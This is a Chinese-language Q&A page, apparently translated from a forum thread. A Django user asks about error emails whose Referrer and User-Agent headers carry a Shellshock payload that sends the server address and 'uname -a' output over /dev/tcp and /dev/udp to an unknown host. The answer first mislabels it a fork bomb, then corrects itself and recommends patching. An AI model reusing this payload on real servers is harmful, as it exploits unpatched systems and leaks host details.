当任何请求失败并且我不断收到此电子邮件时,我已设置django通过电子邮件提醒我:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unkNown_ip>>/21; /bin/uname -a > /dev/tcp/<<unkNown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unkNown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unkNown_ip>>/21; /bin/uname -a > /dev/tcp/<<unkNown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unkNown_ip>>/21"
IP address: 127.0.0.1
这是什么意思?我应该打扰吗?
我正在使用Nginx,ubuntu,gunicorn.
解决方法:
这看起来像是尝试fork bomb:
() { :;};
幸运的是,如果您的服务器在发送后仍在运行,则意味着它正在被清理或被忽略.
正如@TheGreatContini所指出的那样是actually an attempted Shellshock attack.这使我的答案有点不安全.值得确保您的服务器已完全修补并保持最新,并检查任何传出流量以确保您不受影响.
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
